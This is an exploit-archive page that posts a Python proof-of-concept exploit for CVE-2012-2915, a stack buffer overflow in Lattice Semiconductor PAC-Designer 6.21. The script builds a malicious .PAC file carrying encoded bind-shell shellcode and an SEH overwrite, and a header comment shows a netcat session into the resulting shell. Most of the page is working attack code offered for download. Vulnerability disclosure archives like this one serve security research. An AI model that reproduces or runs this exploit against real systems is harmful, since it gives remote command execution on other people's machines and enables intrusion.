exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lattice Semiconductor PAC-Designer 6.21 Overflow

Lattice Semiconductor PAC-Designer 6.21 Overflow
Posted Jun 8, 2012
Authored by b33f

Lattice Semiconductor PAC-Designer version 6.21 suffers from a stack-based buffer overflow.

tags | exploit, overflow
advisories | CVE-2012-2915
SHA-256 | 520230c976f66176275e60d6714d34242413e22d709e7dd05023f8285270adbe

Lattice Semiconductor PAC-Designer 6.21 Overflow

Change Mirror Download
#!/usr/bin/python -w

#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #
# CVE: CVE-2012-2915 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ #
# OS: WinXP SP1 #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig to deep but it seems portability to other OS builds is not promising #
# due to SafeSEH and badchars in the application modules. #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988 #
# (UNKNOWN) [192.168.111.130] 9988 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:\Documents and Settings\Owner\Desktop> #
#------------------------------------------------------------------------------------#

filename="evil.PAC"

PAC1 = """<?xml version="1.0"?>

<PacDesignData>

<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>

<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>

<SymbolicSchematicData>
<Symbol>
<SymKey>153</SymKey>
<NameText>Profile 0 Ref Frequency</NameText>
<Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1) #
#------------------------------------------------------------------------------------#
shellcode = (
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll #
# nSEH: \xEB\x05 #
#------------------------------------------------------------------------------------#
b00m = "\x90"*20 + shellcode
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))

PAC2 = """</Value>
</Symbol>
</SymbolicSchematicData>

</PacDesignData>"""

buffer = PAC1 + payload + PAC2

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close